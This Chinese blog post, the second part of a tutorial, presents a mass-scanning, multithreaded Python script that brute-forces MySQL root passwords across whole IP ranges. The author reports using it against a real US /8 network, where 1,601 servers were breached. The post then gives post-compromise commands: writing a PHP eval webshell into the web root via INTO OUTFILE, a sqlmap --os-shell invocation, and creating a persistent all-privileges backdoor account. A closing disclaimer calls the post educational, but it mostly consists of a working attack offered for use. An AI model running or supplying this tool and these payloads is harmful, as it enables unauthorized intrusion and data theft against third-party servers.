美文网首页效率小天使网络安全实验室
高效python脚本,6小时获取上千台mysql数据库服务器(下

高效python脚本,6小时获取上千台mysql数据库服务器(下

作者: 蚁景科技 | 来源:发表于2018-12-25 16:35 被阅读5次

    接着上篇《高效python脚本,6小时获取上千台mysql数据库服务器(上)》,现在接着来看后续的。

    继续提高效率

    反思:

    在之前测试中,发现有好些的主机在线却ping不通,现在的服务器为了避免恶意的网络攻击,一会拒绝用户Ping服务器。而且调用系统命令行来ping主机是否存活这步骤也很消耗性能,无法设置较高的线程,只能维持在几百。

    改进:

    于是直接删去ping功能,直接调用mysql函数连接3306端口,通过设置join()的超时设置来判断端口是否开放。因为一般情况下,若mysql服务端口3306端口不开放,返回不能连接的错误需要6~8秒左右,但若该端口开放,1秒便能回应。因此设置join(3),若3秒内无回应,则默认端口关闭,销毁该线程。这样改进以后,线程能开到10000左右,效率翻倍提高,代码也更加简洁。

    以下是此次的代码-5:

    #!/usr/bin/envpython

    #coding=utf-8

    #author:Blus

    importMySQLdb

    importthreading

    importtime

    importIPy

    defMySQLdb_connect(ip,  mysql_password,event):

    event1=event

    try:

    event1.clear()

    MySQLdb.connect(ip,mysql_user, mysql_password, '' , 3306)

    event1.clear()

    print ip + ":"+ mysql_password + "  connected"

    ip_log('port_connected.txt',ip, mysql_password)

    except Exception,e:

    e = str(e)

    #print e

    if (e.find('Accessdenied') != -1):

    #端口开放,但密码错误,记录并继续下面的爆破代码

    event1.set() #设置爆破标志

    print ip + ":"+ mysql_password + "  密码错误"

    #ip_log('port_opend.txt',ip, "密码错误")

    pass

    elif (e.find('manyconnections') != -1):

    # 连接过多,暂停1秒

    time.sleep(1)

    event1.set()

    pass

    elif (e.find('Can\'tconnect') != -1):

    # 端口未开放,退出

    event1.clear()

    else:

    # 其他错误,记录并退出

    event1.clear()

    ip_log('port_opend.txt',ip, e)

    return

    #爆破函数

    defmysql_connect2(ip):

    # 先尝试空密码连接threading.Event()

    event1 = threading.Event()

    t2 =threading.Thread(target=MySQLdb_connect, args=(ip, '',event1))

    t2.start()

    t2.join(3) #3秒超时

    if not event1.isSet():

    #未设置标识则退出

    return

    ip_log('port_opend.txt', ip,"密码错误")

    # 开始爆破

    fp_mp =open('mysql_password.txt', 'r')

    for mysql_password infp_mp.readlines():

    #event2 =threading.Event()

    mysql_password =mysql_password.replace('\r', "").replace('\n', "")

    t2 =threading.Thread(target=MySQLdb_connect, args=(ip, mysql_password,event1))

    t2.start()

    t2.join(5)  # 秒超时

    if not event1.isSet():

    # 未设置标识则退出,不然就继续爆破

    fp_mp.close()

    return

    fp_mp.close()

    return

    defip_log(txt_name,ip,content):

    f1 = open(txt_name, 'a')

    f1.write(ip + ":"+ content + "\r\n")

    f1.close()

    if__name__ == "__main__":

    mysql_user='root'

    #设置同时运行的线程数

    threads=10000

    ip1 = IPy.IP('127.0.0.1')

    for ip in ip1:    

    ip=str(ip)

    #print ip

    #限制线程数

    while(threading.activeCount() > threads):

    time.sleep(1)

    t1 =threading.Thread(target=mysql_connect2, args=(ip,))

    t1.start()

    #当线程只剩1时,说明执行完了

    while(threading.activeCount()!=1):

    time.sleep(1)

    print "检测结束"

    优化、修补

    实际测试中发现了一些报错。

    报错一:

    当同时对大量在线的mysql服务器进行密码爆破时,同时不断的读取字典文件可能会报错。于是直接改成了将字典文件读进列表,以后的每次密码爆破都只是在遍历密码列表。另外有一个注意点,Linux是有文件句柄限制的(openfiles),一般最大数为1024。出现其他情况的“Toomant opeb file”报错,也可以用这个命令ulimit-n 102400,增大打开文件数来解决。

    创建密码列表:

    循环读取列表

    为了防止意外发生写文件错误,也给它加了层“防护衣”:

    报错信息二:

    之前没有考虑这个问题,实际测试中也蛮多的,发生在网站状态不稳定的情况下。没什么好说的,错误信息判断里面补上.在错误信息判断里面补上,网络不好就暂停一会儿。

    以下是本次的完整代码-6:

    #!/usr/bin/envpython

    #coding=utf-8

    #author:Blus

    importMySQLdb

    importthreading

    importtime

    importIPy

    defMySQLdb_connect(ip,  mysql_password,event):

    event1=event

    try:

    event1.clear()

    MySQLdb.connect(ip,mysql_user, mysql_password, '' , 3306)

    event1.clear()

    print ip + ":"+ mysql_password + "  connected"

    ip_log('port_connected.txt',ip, mysql_password)

    except Exception,e:

    e = str(e)

    #print e

    if (e.find('Accessdenied') != -1):

    #端口开放,但密码错误,记录并继续下面的爆破代码

    event1.set() #设置爆破标志

    #print ip + ":"+ mysql_password + "  密码错误"

    #ip_log('port_opend.txt',ip, "密码错误")

    pass

    elif (e.find('manyconnections') != -1):

    # 连接过多,暂停1秒

    time.sleep(1)

    event1.set()

    pass

    elif (e.find('Can\'tconnect') != -1):

    # 端口未开放,退出

    event1.clear()

    else:

    # 其他错误,记录并退出

    event1.clear()

    ip_log('port_opend.txt',ip, e)

    return

    #爆破函数

    defmysql_connect2(ip):

    # 先尝试空密码连接threading.Event()

    event1 = threading.Event()

    t2 =threading.Thread(target=MySQLdb_connect, args=(ip, '',event1))

    t2.start()

    t2.join(3) #3秒超时

    if not event1.isSet():

    #未设置标识则退出

    return

    ip_log('port_opend.txt', ip,"密码错误")

    # 开始爆破

    global list_password

    for mysql_password inlist_password:

    mysql_password =mysql_password.replace('\r', "").replace('\n', "")

    t2 =threading.Thread(target=MySQLdb_connect, args=(ip, mysql_password,event1))

    t2.start()

    t2.join(5)  # 秒超时

    if not event1.isSet():

    # 未设置标识则退出,不然就继续爆破

    fp_mp.close()

    return

    return

    defip_log(txt_name,ip,content):

    try:

    f1 = open(txt_name, 'a')

    f1.write(ip + ":"+ content + "\r\n")

    f1.close()

    except Exception, e:

    print str(e)

    pass

    if__name__ == "__main__":

    #设置数据库用户名

    mysql_user='root'

    #设置同时运行的线程数

    threads=10000

    #指定IP网段

    ip1 =IPy.IP('192.168.50.1/32')

    #将密码字典读进列表

    list_password= []

    fp_mp =open('mysql_password.txt', 'r')

    for password infp_mp.readlines():

    list_password.append(password)

    for ip in ip1:    

    ip=str(ip)

    #限制同时运行的线程数

    while(threading.activeCount() > threads):

    time.sleep(1)

    t1 =threading.Thread(target=mysql_connect2, args=(ip,))

    t1.start()

    while(threading.activeCount()!=1):

    # 当线程只剩1时,说明执行完了

    time.sleep(1)

    print "检测结束"

    获取数据库服务器权限

    至此,MySql工具基本升级完成,本来还应该加上相关的自动攻击代码,但发现目前网上还存在大量弱口令连接的数据库服务器,而且数据库服务器重要的是数据,其数据比一台服务器的权限更宝贵。因此,在这就只是简单和大家探讨几种常见的Mysql攻击手段。

    1.system函数调用系统命令

    在MySQL5.x中增加了system命令,简单的符号是\!,从而使MySQL可以执行系统的命令。例如systemifconfig或者\!ifconfig。

    当然不一定会开启这个函数,可以在mysql命令行下输入help,来查看是否存在system函数,若有则能使用该函数。

    2. outfile写小马

    只限于站库未分离的服务器,写在数据库的字段中写入小马内容,再利用outfile导出成一个小马,放置于web目录下。基本命令如下:

    createdatabase A123456666;

    useA123456666;

    CREATETABLE A123456666.B123456 (C123456 TEXT NOT NULL );

    INSERTINTO B123456 (C123456)VALUES ('111');

    SELECTC123456 from B123456 into outfile '网站路径/shell.php';

    dropdatabase A123456666;

    也可以简化为:

    SELECT'<?php @eval($_POST[cmd]); ?>'  into outfile  '/var/www/html/shell.php';

    3.另外还有udf、mof提权,以及msf、sqlmap自动工具之类的

    举例:  sqlmap.py-d   "mysql://root:1234@192.168.1.1:3306/databasename" --os-shell

    哪怕无法获得整台服务器的权限,但只要能一直维持对数据库的访问也是极好的。

    服务器的数据库密码很可能会被更改,因此在获得数据库的密码后,立刻创建一个新账户还是比较重要的。可以紧接着执行如下命令:

    CREATEUSER 'big'@'%' IDENTIFIED BY '123456';创建用户名为big,密码为123456的用户

    GRANTALL PRIVILEGES ON *.* TO 'big'@'%' IDENTIFIED BY '123456';授权

    flushprivilege;刷新权限

    十、测试分析结果

     是骡是马得拉出来溜溜,选了个明媚的中文,开了主机运行脚本,每台一万个线程,跑了大半天米国的某X.0.0.0/8网段。本不抱什么希望,最后结果却出人意料。

     共计255x255x255=16581375个IP,其中有44979个mysql服务器在线,其中4,776个只允许指定的ip连接,553个端口报错,37450个端口可正常连接。在可正常连接的37450端口中,爆破密码成功连接的有1601个,真可谓是“万里挑一”。

    下面附上部分截图:

    爆破成功的记录

    测试中出现过的报错情况:

    数据库截图,虽然是美国的网段,但发现也有其他国家地区部署的数据库,包括中国。

    发现一些已经被黑客攻击的网站,数据库被删除,只留下WARNING-Readme。受害者只有向黑客支付比特币才能恢复数据。国内一般都是直接脱库、分类、汇总,然后卖数据。

    勒索信息:

    Your Database isdownloaded and backed up on our secured servers. To recover your lostdata: Send 0.6 BTC to our BitCoin Address and Contact us by eMailwith your server IP Address and a Proof of Payment. Any eMail withoutyour server IP Address and a Proof of Payment together will beignored. We will drop the backup after 24 hours. You are welcome!.”

    结语

    可能有人会说,不就是个批量爆破工具吗。但我并不只是想分享一个工具,同时也是把这个脚本诞生的过程一步一步的展现出来,便于大家探讨学习。不只是单纯的用工具,更是要学会工具背后的原理及其意义。另外就是与大家分享一下安全现状,如果只是自己在扫,也不一定有耐心能扫出这么多带漏洞的服务器,我在扫的时候,有时候连扫几十个网段都不见得有一台mysql服务器。 这次扫描的X.0.0.0 -X.127.0.0网段只扫出来50台MySql服务器。而X.128.0.0-X.255.0.0却有上万台。可能是因为很多云服务器厂家,包括大型企事业单位,他们服务器的ip都是“扎堆”在一起的吧。因此网段选得好,也能影响最后的结果。这需要“手气”,同时也需要耐心。在爆破密码的时候更需要一个精巧的字典,在精不在多,本人使用的字典只有5kb,但却包含了许多的高频弱口令。每年都会有TOP100的弱口令报告出来,要注意收集。国外的安全情况如此,国内的安全情况也不容乐观,我们储存在网上的个人信息和数据很容易就会被不法分子窃取。作为网络安全从业者的我们,应该积极响应国家号召,在自己的岗位上尽心尽力,遵守国家的法律。不去做危害计算机安全的事,哪怕是国外的服务器。每年都有入狱的“黑客”,望大家引以为戒。也希望能大家一起学习成长,有兴趣的大佬可以加我的微信jjinchengg,谢谢。

    上述所有脚本已打包:https://pan.baidu.com/s/12skXEu2wLP0W_0LSYMZ0eQ 

    提取码:jy0h

    压缩包密码是:blusblus


    本文仅用于普及网络安全知识,提高小伙伴的安全意识的同时介绍常见漏洞的特征等,若读者因此做出危害网络安全的行为后果自负,与合天智汇以及原作者无关,特此声明。本文为原创文章,转载请注明出处!

    相关文章

      网友评论

        本文标题:高效python脚本,6小时获取上千台mysql数据库服务器(下

        本文链接:https://www.haomeiwen.com/subject/pjwflqtx.html